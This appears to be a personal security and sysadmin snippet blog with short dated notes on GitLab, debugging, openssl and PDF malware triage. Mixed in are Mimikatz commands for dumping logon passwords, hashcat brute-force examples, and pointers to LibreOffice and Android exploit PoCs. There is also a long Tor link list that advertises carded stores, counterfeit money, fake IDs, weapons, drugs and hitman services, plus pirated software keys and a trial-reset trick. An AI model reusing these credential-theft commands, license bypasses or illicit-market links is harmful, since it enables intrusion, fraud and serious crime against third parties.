## SGNSL ##

2020-02-03
Bash copy with status - dd versus dcfldd Enhanced version of dd for forensics and security

dd => dcfldd
/ bash, linux

2020-01-12
GITLAB - testing email sudo gitlab-rails console

:smtp

Notify.test_email('youremail@email.com', 'Hello World', 'This is a test message').deliver_now
/

2020-01-10
Exec ELF 32 binary on 64 bits dpkg --add-architecture i386

apt-get update

apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386
/

2019-09-06
Windows X86-64 System Call Table System Call Symbol Table for XP/2003/Vista/2008/7/2012/8/10
/

2019-08-01
Linux set local time /bin/cp /usr/share/zoneinfo/Europe/Paris /etc/localtime
/ linux, date, time

2019-02-22
Gitlab on TLS - Let's encrypt external_url 'https://pipo.domaine.fr'
letsencrypt['enable'] = true
registry_external_url 'pipo.domaine.fr'
mattermost_external_url 'pipo.domaine.fr'
gitlab-ctl reconfigure
/ gitlab

2019-02-21
IDA_versus_cutter-radare2 What a fu**ing nice free tool ?
/ reverse

2019-02-01
RCE LibreOffice CVE-2018-16858 Libreoffice (CVE-2018-16858) - Remote Code Execution via Macro/Event execution

Tested LibreOffice version: 6.1.2.1 (6.0.x does not allow to pass parameters) Tested Operating Systems: Windows + Linux (both affected)
/ exploit

2019-01-16
Mimikatz just backup

log sekurlsa.log
privilege::debug
sekurlsa::logonpasswords
/

2018-12-18
Rebase IDA from GDB gdb$ info file
Entry point: 0x5555560a3ff8
0x0000555555f97e50 - 0x0000555557a8a27e is .text

gdb$ info proc mapping
process 6331
Mapped address spaces:

Start Addr < - > End Addr < - > Size < - > Offset objfile
0x555555554000 < - > 0x55555835e000 < - > 0x2e0a000 < - > 0x0 < - > /opt/myapp
=> 0x55555835e000 < - > 0x555558427000 < - > 0xc9000< - > 0x2e09000 < - > /opt/myapp

# rebase IDA with : 0x55555835e000
/ ida,reverse,gdb

2018-12-18
Sandbox Windows
/ windows, sandbox

2018-12-16
Extract .deb file
ar x *.deb
tar xvf control.tar.gz
tar xvf data.tar.xz
/

2018-12-12
eZ Openssl Crypt / decrypt file :

openssl enc -e -aes-256-cbc -in $clearfile -out $cryptfile
openssl enc -d -aes-256-cbc -in $cryptfile -out $clearfile


Test an SSL/TLS domain

$ openssl s_client -connect sgnsl.troptop.net:443

/ openssl

2018-12-12
Hashcat For a AMD RX580 Graphic card, use the following driver

# apt-get install opencl-amdgpu-pro

Exemple :

$ hashcat64.bin -a 3 -m 0 md5.txt ?l?l?l?l?l?l?l?l?l?l -w 4 -i -O

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: MD5
Hash.Target......: db0edd04aaac4506f7edab03ac855d56
Time.Started.....: Sat Jan 19 13:39:17 2019 (1 min, 55 secs)
Time.Estimated...: Sat Jan 19 13:42:02 2019 (50 secs)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d [9]
Guess.Queue......: 9/9 (100.00%)
Speed.#1.........: 12628.5 MH/s (181.49ms) @ Accel:256 Loops:1024 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 1446116327424/2088270645760 (69.25%)
Rejected.........: 0/1446116327424 (0.00%)
Restore.Point....: 80216064/118813760 (67.51%)
Restore.Sub.#1...: Salt:0 Amplifier:15360-16384 Iteration:0-1024
Candidates.#1....: owqrzqcf6 -> biikvyyv4
Hardware.Mon.#1..: Temp: 63c Fan: 23% Core:1411MHz Mem:2000MHz Bus:0


--
Moooore,

$ statsprocessor

sp64.bin --pw-min 8 --pw-max 8 .statsprocessor-0.11/hashcat.hcstat ?l?l?l?l?l?l?l?d > dico.txt
https://hashcat.net/wiki/doku.php?id=statsprocessor / hashcat,hash,bruteforce

2018-11-20
SPLUNK download Download splunk :


.DEB
https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=7.2.1&product=splunk&filename=splunk-7.2.1-be11b2c46e23-linux-2.6-amd64.deb&wget=true

.MSI
https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=windows&version=7.2.1&product=splunk&filename=splunk-7.2.1-be11b2c46e23-x64-release.msi&wget=true


wget -O spl_1.deb 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=7.2.1&product=splunk&filename=splunk-7.2.1-be11b2c46e23-linux-2.6-amd64.deb&wget=true'

Forwarder :
https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=ARM&platform=linux&version=7.2.1&product=universalforwarder&filename=splunkforwarder-7.2.1-be11b2c46e23-Linux-arm.tgz&wget=true
/ SIEM, splunk

2018-11-05
Remove REGEDIT :
\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svsvc

set the value to 4 (or more)
/ windows, watermark

2018-10-23
PDF Analyze - pdf-parser Commandes basiques sur pdf-parser.py :

# Recherche de pattern "brute"
$ strings FIXME.pdf | egrep -i "javascript|js"

# Recherche de pattern (shellcode / javascript)
$ hexdump -C FIXME.pdf | egrep -i "4a 61 76 61|73 63 72 69 70 74|6a 61 76 61|73 63 72 69 70 74"
$ hexdump -C FIXME.pdf | egrep -i "90 90 90|EB CB| 48 31 C0|48 31 D2"

$ pdf-parser.py --stats FIXME.pdf

# La présence de la section suivante ajoute une part suspicieuse au PDF.
/Encoding 1: 78

$ pdf-parser.py --search javascript FIXME.pdf [*]

[*] Le code JS n'est pas supposé s'exécuter si le pattern JavaScript n'est pas présent mais nous ne sommes pas à l'abris d'un encodage (voir dernière commande).

$ pdf-parser.py --search javascript --raw FIXME.pdf

$ pdf-parser.py --object 42 --raw FIXME.pdf

$ pdf-parser.py --object 42 --raw --filter FIXME.pdf

$ pdf-parser.py --reference 42 --raw FIXME.pdf

------------

Plus automatisé et plus sûr, il serait difficile d'exécuter du JS sans variable, fonction et autres keywords:

$ pdf-parser.py FIXME.pdf | egrep "obj " | wc -l
150

# Utiliser le résultat pour fixer la boucle.

$ for i in `seq 1 150_FIXME`; do pdf-parser.py -o $i --raw --filter FIXME.pdf | egrep -i "var|function|eval|while|for|return|break"; done

/ analyze, malware, pdf

2018-09-24
Extract Outlook .MSG => Extract the email :

$ sudo apt-get install libemail-outlook-message-perl libemail-sender-perl

$ msgconvert *.msg


=> Extract the attachment :

$ sudo apt-get install mpack

$ munpack *.eml
/ outlook, bash

2018-06-13
Replace text pattern Replace text pattern on all files of the folder
find . -type f -print0 | xargs -0 sed -i 's/litecoin/bricocoin/g'
/ edit

2018-05-09
Usurpation Email Google Reporting a Google's email usurpation
/ google, email

2018-04-24
Visual Studio What to do when
"msvcp140.dll is missing"

right click ConsoleApplication1
C/C++ / Code Generator / Runtime Library /
Change :
/MD
to
/MT
/

2018-04-17
TOR NewCircuitPeriod #circuit hacks
NewCircuitPeriod 40
MaxCircuitDirtiness 600
MaxClientCircuitsPending 48
UseEntryGuards 1
EnforceDistinctSubnets 1

/ tor

2017-12-20
Android CVE-2016 Android CVE 2016 with POC =)

http://sgnsl.free.fr/ftp/android_vuln_poc-exp-2016.zip /

2017-12-11
Onion URL mirror Hidden Service lists and search engines

http://5jp7xtmox6jyoqd5.onion/ – Riseup.net pad
http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine
http://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Engine
http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki
http://32rfckwuorlf4dlv.onion/ – Onion URL Repository
http://e266al32vpuorbyg.onion/bookmarks.php – Dark Nexus
http://5plvrsgydwy2sgce.onion/ – Seeks Search
http://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenet
http://nlmymchrmnlmbnii.onion/ – Is It Up?
http://kpynyvym6xqi7wz2.onion/links.html – ParaZite
http://wiki5kauuihowqi5.onion/ – Onion Wiki – 650+ working 05.2017 deep web links
http://kpvz7ki2v5agwt35.onion – The Hidden Wiki
http://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity Online
http://torlinkbgs6aabns.onion/ – TorLinks
http://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urls
http://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wiki
http://xdagknwjc7aaytzh.onion/ – Anonet Webproxy
http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting
http://3fyb44wdhnd2ghhl.onion/ – All You’re Base
http://j6im4v42ur6dpic3.onion/ – TorProject Archive
http://p3igkncehackjtib.onion/ – TorProject Media
http://kbhpodhnfxl3clb4.onion – Tor Search
http://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)
http://dppmfxaacucguzpc.onion/ – TorDir – One of the oldest link lists on Tor
Marketplace Financial
http://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs
http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry
http://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STORE
http://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.
http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with free Bitcoin Mixer
http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more
http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry
http://qc7ilonwpv77qibm.onion/ – Western Union Exploit
http://3dbr5t4pygahedms.onion/ – ccPal Store
http://y3fpieiezy2sin4a.onion/ – HQER – High Quality Euro Replicas
http://qkj4drtgvpm7eecl.onion/ – Counterfeit USD
http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins
http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins
http://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality Tutorials
Marketplace Commercial Services
http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forums
http://wvk32thojln4gpp4.onion/ – Project Evil
http://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goods
http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman service
http://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girls
http://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammo
http://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Guns
http://ucx7bkbi2dtia36r.onion/ – Amazon Business
http://nr6juudpp4as4gjg.onion/tor.html – Tor Technology
http://hbetshipq5yhhrsd.onion/ – Hidden BetCoin
http://cstoreav7i44h2lr.onion/ – CStore Carded Store
http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin
http://e2qizoerj4d6ldif.onion/ – Carded Store
http://jvrnuue4bvbftiby.onion/ – Data-Bay
http://bgkitnugq5ef2cpi.onion/ – Hackintosh
http://vlp4uw5ui22ljlg7.onion/ – EuroArms
http://b4vqxw2j36wf2bqa.onion/ – Advantage Products
http://ybp4oezfhk24hxmb.onion/ – Hitman Network
http://mts7hqqqeogujc5e.onion/ – Marianic Technology Services
http://mobil7rab6nuf7vx.onion/ – Mobile Store
http://54flq67kqr5wvjqf.onion/ – MSR Shop
http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services
http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop
http://storegsq3o5mfxiz.onion/ – Samsung StorE
http://sheep5u64fi457aw.onion/ – Sheep Marketplace
http://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoin
http://qizriixqwmeq4p5b.onion/ – Tor Web Developer
http://vfqnd6mieccqyiit.onion/ – UK Passports
http://en35tuzqmn4lofbk.onion/ – US Fake ID Store
http://xfnwyig7olypdq5r.onion/ – USA Citizenship
http://uybu3melulmoljnd.onion/ – iLike Help Guy
http://dbmv53j45pcv534x.onion/ – Network Consulting and Software Development
http://lw4ipk5choakk5ze.onion/raw/4585/ – Quick Solution (Hitman)
http://nr6juudpp4as4gjg.onion/tynermsr.htm – Tyner MSR Store
Marketplace Drugs
http://rso4hutlefirefqp.onion/ – EuCanna – Medical Grade Cannabis Buds, Rick Simpson Oil, Ointments and Creams
http://newpdsuslmzqazvr.onion/ – Peoples Drug Store – The Darkweb’s Best Online Drug Supplier!
http://smoker32pk4qt3mx.onion/ – Smokeables – Finest Organic Cannabis shipped from the USA
http://fzqnrlcvhkgbdwx5.onion/ – CannabisUK – UK Wholesale Cannabis Supplier
http://kbvbh4kdddiha2ht.onion/ – DeDope – German Weed and Hash shop. (Bitcoin)
http://s5q54hfww56ov2xc.onion/ – BitPharma – EU vendor for cocaine, speed, mdma, psychedelics and subscriptions
http://ll6lardicrvrljvq.onion/ – Brainmagic – Best psychedelics on the darknet
http://25ffhnaechrbzwf3.onion/ – NLGrowers – Coffee Shop grade Cannabis from the netherlands
http://fec33nz6mhzd54zj.onion/index.php – Black Market Reloaded Forums
http://atlmlxbk2mbupwgr.onion/ – Atlantis Marketplace Forums
http://atlantisrky4es5q.onion/ – Atlantis Marketplace
http://dkn255hz262ypmii.onion/ – Silk Road Forums
http://4yjes6zfucnh7vcj.onion/ – Drug Market
http://k4btcoezc5tlxyaf.onion/ – Kamagra for BitCoins
http://silkroadvb5piz3r.onion/silkroad/home – Silk Road Marketplace
http://5onwnspjvuk7cwvk.onion/ – Black Market Reloaded
Hosting
http://matrixtxri745dfw.onion/ – Image Uploader
http://lw4ipk5choakk5ze.onion/ – PasteThis – Tor based Pastebin
http://wzrtr6gpencksu3d.onion:8080/ – Gittor
http://nr6juudpp4as4gjg.onion/ – Free hosting
http://tklxxs3rdzdjppnl.onion/ – Liberty’s Hackers Hosting Service
http://matrixtxri745dfw.onion/ – Matrix Trilogy
Blogs
http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ – Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ – Hushbox
http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
http://tns7i5gucaaussz4.onion/ – FreeFor
http://gdkez5whqhpthb4d.onion/ – Scientology Archive
http://newsiiwanaduqpre.onion/ – All the latest news for tor
http://5vppavyzjkfs45r4.onion/ – Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
http://tigas3l7uusztiqu.onion/ – Mike Tigas
http://mpf3i4k43xc2usxj.onion/ – Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ – Totse 2
http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland
Forums and Chans
http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
http://bx7zrcsebkma7ids.onion – Jisko
http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ – SciBay Forums
http://kpmp444tubeirwan.onion/ – DeepWeb
http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor
Email and Messaging
http://bitmailendavkbec.onion – swiss email
http://365u4txyqfy72nul.onion/ – Anonymous E-mail sevice. You can only communicate with other users currently using this service. So tell all your friends about it!
http://sms4tor3vcr2geip.onion/ – SMS4TOR – Self destructing messages
http://notestjxctkwbk6z.onion/ – NoteBin – Create encrypted self-destructing notes
http://torbox3uiot6wchz.onion/ – [TorBox] The Tor Mail Box
http://u6lyst27lmelm6oy.onion/index.php – Blue matrix chat NOT UP ALL THE TIME so chek often to see when it is
http://wi7qkxyrdpu5cmvr.onion/ – Autistici/Inventati
http://u4uoz3aphqbdc754.onion/ – Hell Online
Political
http://6sgjmi53igmg7fm7.onion/index.php?title=Main_Page – Bugged Planet
http://faerieuaahqvzgby.onion/ – Fairie Underground
http://2r2tz6wzqh7gaji7.onion/ – Kavkaz Center
http://tnysbtbxsf356hiy.onion/ – The New Yorker Strongbox
http://duskgytldkxiuqc6.onion/ – Example rendezvous points page
http://rrcc5uuudhh4oz3c.onion/ – The Intel Exchange Forum :: Information and discussion on various topics, ranging from Illegal Activities and Alternative Energy, to Conspiracy Theories and Hacking. Same people from SnapBBS on a fully secure, moderated and categorized forum.
http://opnju4nyz7wbypme.onion/weblog/index.html – A7B blog :: a blog dedicated to the restoration of a limited constitutional republic in the USA
http://assmkedzgorodn7o.onion/ – Anonymous, safe, secure, crowdfunded assassinations.
http://duskgytldkxiuqc6.onion/comsense.html – Commo Sense by Thomas Paine
http://nwycvryrozllb42g.onion/ – Destination Unknown
http://zbnnr7qzaxlk5tms.onion/ – Wiki Leaks
Hacking
http://salted7fpnlaguiq.onion/ – SALT
http://yj5rbziqttulgidy.onion/ – Itanimulli
http://bbxdfsru7lmmbj32.onion/marketplace/ – Delta Initiative
http://2ogmrlfzdthnwkez.onion/ – Rent-A-Hacker
Warez
http://2gxxzwnj52jutais.onion/ – The Nowhere Server (restored from backup after FH)
http://jntlesnev5o7zysa.onion/ – The Pirate Bay – Torrents
http://am4wuhz3zifexz5u.onion/ – Tor Library – library of books and other media files
http://uj3wazyk5u4hnvtk.onion/ – The Pirate Bay – Torrents (official .onion)
http://doxbindtelxceher.onion/ – DOXBIN
http://wuvdsbmbwyjzsgei.onion/ – Music Downloads
http://lolicore75rq3tm5.onion/ – Lolicore and Speedcore Music
http://xfmro77i3lixucja.onion/ – ebooks
http://vt27twhtksyvjrky.onion/ – lol 20th Century Western Music Recordings and Scores
http://2ygbaoezjdmacnro.onion/ – Pony at Noisebridge
http://xfmro77i3lixucja.onion/ – Imperial Library of Trantor
http://c3jemx2ube5v5zpg.onion/ – Jotunbane’s Reading Club

Non-English
http://germanyhusicaysx.onion – Deutschland im Deep Web – German forum
http://ffi5v46ttwgx3fby.onion/ – Das ist Deutschland hier 2.0 – German Board
http://paisleli66axejos.onion/ – PAIS
http://runionv62ul3roit.onion/ – Russian Onion Union
http://s6cco2jylmxqcdeh.onion/ – ?ltimos bumps
http://5xki35vc4g5ts6gc.onion – GTF Greek Tor Forum . For greek speaking users
http://cipollatnumrrahd.onion/index.php – Cipolla 2.0 – Italian Community
http://runionv62ul3roit.onion – Russian community: market and anonymous talks about security, guns etc.
http://ptrackcp2noqu5fh.onion/ – PoliceTrack – Ne vous faites plus suivre par la police.
http://amberoadychffmyw.onion – Amberoad – russian anonymous market
http://r2d2akbw3jpt4zbf.onion – R2D2 – russian anonymous market
http://ramp2bombkadwvgz.onion – RAMP – biggest russian market (drugs only)
http://szmyt4v4vjbnxpg3.onion/ – Славянский
http://o2tu5zjxjlibrary.onion/ – Bibliotheca Alexandrina
http://xzzpowtjlobho6kd.onion/wordpress/ – DeepBlog
http://zqiirytam276uogb.onion/ – Thorlauta
http://ocbh4hoqs37unvv6.onion – French Deep Web

thehiddenwiki / tor

2017-12-07
Python SIGINT signal There is multiple ways for interrupt a program by ctrl+c with Python

####
try:
main()
except KeyboardInterrupt:
sys.exit()
####

####
def ctrl_c(sig, frame):
sys.exit()

def main():
signal.signal(signal.SIGINT, ctrl_c)
####

####
def ctrl_c_with_arg(sig, frame):
print(g_var)
sys.exit()

def main():
g_var = 'toto'
signal.signal(signal.SIGINT, functools.partial(ctrl_c_with_arg, g_var))
####
/ python, signal

2017-11-10
Nmap script # nmap --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed -p 443,465,993,995
Take a look at the official nmap lists scripts
/ nmap, network

2017-10-26
Trial version Windows Do you want 30 more days without licence ?
Run as administrator the following command, then reboot
$ slmgr -rearm

/ windows

2017-01-24
Extract MSI/MSU $ expand -F:* BINARY.msi extractedDirectory
/ windows

2017-01-06
ASM Registers Use Sequence ELF x86-64: RDI RSI EDX ECX R8 R9
ELF x86: {STACK} {STACK} {STACK} {STACK} {STACK} {STACK}
PE x86-64: ECX EDX R8 R9 {STACK} {STACK}

/ asm

2016-10-24
OllyDBG Search pattern
/ ollydbg, asm

2016-10-17
All versions
https://ftp.mozilla.org/pub/firefox/releases/ / Wireshark, Firefox

2016-08-19
Network struct C
http://sgnsl.free.fr/ftp/src/network_struct_c.txt / c, development, network

2016-08-09
Incremental copy on Windows xcopy D:\_code G:\_code /E /H /R /Y /I /D
xcopy [source] [destination]
/ copy, windows

2016-07-17
GIT over SSH with option export GIT_SSH_COMMAND="ssh -o GSSAPIAuthentication=yes"

Use rsa key:
$> export GIT_SSH_COMMAND="ssh -i $rsa_key"
thanks Russian mate ;) / git

2016-07-15
IDA linux debugger error "the file can't be loaded by the debugger"
did you forgot to set your binary right ?
$ chmod u+x {binary}
/ ida, debugger

2016-07-15
Windows Environment Variable
/ windows, Environment Variable

2016-07-05
Windows 10 telemetry Use this hosts file for downgrading windows 10 telemetry.
MISC n 86 juillet/aout 2016 / windows, telemetry

2016-05-03
GDB vs real
/ gdb, reverse

2016-04-25
Signaux Linux 4.2
/ C, signal, dev

2016-02-23
GDB magic commands Set define
(gdb) define myNext
> next
> disas main
> end

Follow fork
(gdb) set follow-fork-mode parent
(gdb) set follow-fork-mode child
(gdb) show follow-fork-mode

Set stack address
(gdb) set {int}0x08040000 = 42
/ gdb

2016-01-21
Privilege escalation
/

2015-12-31
PDF-parser How to find some information inside a PDF, like Javascript object ...

Blog,
http://blog.didierstevens.com/programs/pdf-tools/

App,
http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip

To learn about
http://esec-lab.sogeti.com/posts/2011/09/22/hacklu-ctf-2011-write-up-romulan-business-network.html

Other usefull tools
# apt-get install pdfminer-data python-pdfminer

X pdf reader with some command line tools (pdfinfo ...)
# apt-get install xpdf
/ pdf, forensic

2015-12-31
NodeJS Installing NodeJs on debian system,

$ curl -sL https://deb.nodesource.com/setup_5.x > setup_nodejs.sh
# apt-get install nodejs npm

$ echo "console.log('hello node');" > hello.js
$ node hello.js
github / javascript, ligne de commande

2015-12-18
010 Editor Name : Tomay
Password: 00C0-FD9C-6495-4C5E
/

2015-11-10
Gcc Compilation 32 bits
#apt-get install g++-multilib libc6-dev-i386

$ gcc -m32 toto.c -o toto
/

2015-10-15
WinDBG and more _NT_SYMBOL_PATH = srv*C:\symbols*http://msdl.microsoft.com/download/symbols;SRV*c:\symbols*http://symbols.mozilla.org/;SRV*c:\symbols*https://chromium-browser-symsrv.commondatastorage.googleapis.com

MOZ_CRASHREPORTER_DISABLE = 1

https://blog.mozilla.org/security/2012/06/20/7-tips-for-fuzzing-firefox-more-effectively/
PATH =
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Internet Explorer;C:\Program Files (x86)\Opera;C:\Program Files (x86)\Mozilla Firefox;C:\Program Files (x86)\Google\Chrome\Application;C:\Python34;C:\cygwin64\bin

Problème IDA chargement dll
C:\Program Files (x86)\Windows Kits\10\Debuggers\x86>symchk.exe -v C:\Windows\System32\mshtml.dll
cp c:\symbols\*.pbd -> avec .dll

.prompt_allow +reg
microsoft_library_prompt_windbg
Commandes :
windbg.info/doc/1-common-cmds
Set winDBG as default debugger just-in-time (post-mortem)
"C:\pgm\Windows Kits\10\Debuggers\x86\windbg.exe" -I
launch as admin => pop up

Disable windbg jit just in time
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger

Switch following parent child:
'.childdbg 1', '|1s', '|0s'


IDA with dll!Object::methodUnBreakPointeble
windbg> lm vm dll.dll
windbg> start 6eXX0000
? 6eXX0000
IDA/Options/LinesPrefix
CALC: 1022470B-10000000=22470B
windbg> u 6eXX0000 + 22470B
dll!Object::methodUnBreakPointeble
6eXX470b push ecx
6eXX470c push esi

bp 6eXX0000 + 22470B
---
windbg> .formats 42
windbg> bp pipo::Lol ".echo \"Data: \n\"; dds ebx L4; gc" windbg> bp pipo!lol+34 ".if (poi(rbp+50)+28 == 0) {} .else {gc}"
/ windbg, symbol, debuggeur

2015-10-15
Logic instructions ASM
http://deamonftp.free.fr/deamoncrack/index0.htm / asm

2015-10-13
Simple GET Comment faire un GET simple d'une page web en supprimant les balises HTML et les lignes vides.

$ GET sgnsl.free.fr | sed "s/<[^>]*[>]//g" | sed '/^\s*$/d'
/ linux, commande, shell

2015-10-05
Windows license keys Clés d’installation des clients Windows 10 :
Windows 10 Famille : TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Windows 10 Professionnel : VK7JG-NPHTM-C97JM-9MPGT-3V66T ou W269N-WFGWX-YVC9B-4J6C9-T83GX
Windows 10 Professionnel N : MH37W-N47XK-V7XM9-C7227-GCQG9
Windows 10 core (home) : TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Windows 10 Professional : W269N-WFGWX-YVC9B-4J6C9-T83GX
Windows 10 Enterprise : NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Education : NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Enterprise 2015 LTSB : WNMTR-4C88C-JK8YV-HQ7T2-76DF9


Clés d’installation des clients Windows 8.1 et Windows Server 2012 R2 :
Windows 8.1 Core (home) : 334NH-RXG76-64THK-C7CKG-D3VPT
Windows 8.1 Professional : GCRJD-8NW9H-F2CDX-CCM8D-9D6T9 ou XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
Windows 8.1 Enterprise : MHF9N-XY6XB-WVXMC-BTDCT-MKKG7 ou MNDGV-M6PKV-DV4DR-CYY8X-2YRXH
Windows Server 2012 R2 Server Standard : D2N9P-3P6X9-2R39C-7RTCD-MDVJX
Windows Server 2012 R2 Datacenter : W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9
Windows Server 2012 R2 Essentials : KNC87-3J2TX-XB4WP-VCPJV-M4FWM


Clés d’installation des clients Windows 8 et Windows Server 2012 :
Windows 8 Professional : NG4HW-VH26C-733KW-K6F98-J8CK4
Windows 8 Enterprise : 32JNW-9KQ84-P47T8-D8GGY-CWCK7
Windows Server 2012 : BN3D2-R7TKB-3YPBD-8DRP2-27GG4
Windows Server 2012 Server Standard : XC9B7-NBPP2-83J2H-RHMBY-92BT4
Windows Server 2012 Datacenter : 48HP8-DN98B-MYWDG-T2DCC-8W83P
Windows Server 2012 MultiPoint Standard : HM7DN-YVMH3-46JC3-XYTG7-CYQJJ
Windows Server 2012 MultiPoint Premium : XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G


Clés d’installation des clients Windows 7 et Windows 2008 R2:
Windows 7 home : RHPQ2-RMFJH-74XYM-BH4JX-XM76F
Windows 7 Professional : FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
Windows 7 Enterprise : 33PXH-7Y6KF-2VJC9-XBBR8-HVTHH
Windows Server 2008 R2 Web : 6TPJF-RBVHG-WBW2R-86QPH-6RTM4
Windows Server 2008 R2 HPC edition : TT8MH-CG224-D3D7Q-498W2-9QCTX
Windows Server 2008 R2 Standard : YC6KT-GKW9T-YTKYR-T4X34-R7VHC
Windows Server 2008 R2 Enterprise : 489J6-VHDMP-X63PK-3K798-CPX3Y
Windows Server 2008 R2 Datacenter : 74YFP-3QFB3-KQT8W-PMXWJ-7M648
Windows Server 2008 R2 for Itanium-based Systems : GT63C-RJFQ3-4GMB6-BRFB9-CB83V


Clés de licence Windows Seven 32 Bits :
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
TQ32R-WFBDM-G FHD2-QGVMH-3P9GC
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
6JKV2-QPB8H-RQ893-FW7TM-PBJ73


Clés de licence Windows Seven 64 Bits :
482XP-6J9WR-4JXT3-VBPP6-FQF4M
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
JYDV8-H8VXG-7 4RPT-6BJPB-X42V4
7XRCQ-RPY28-YY9P8-R6HD8-84GH3
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH


Clés d’installation des clients Office 2013 + Visio:
Office 2013 Professionnel Plus : YC7DK-G2NP3-2QQC3-J6H88-GVGXT
Office 2013 Standard : KBKQT-2NMXY-JJWGP-M62JB-92CD4
Project 2013 Professionnel : FN8TT-7WMH6-2D4X9-M337T-2342K
Word 2013 : 6Q7VD-NX8JD-WJ2VH-88V73-4GBJ7
Excel 2013 : VGPNG-Y7HQW-9RHP7-TKPV3-BG7GB
Access 2013 : NG2JY-H4JBT-HQXYP-78QH9-4JM2D
OneNote 2013 : TGN6P-8MMBC-37P2F-XHXXK-P34VW
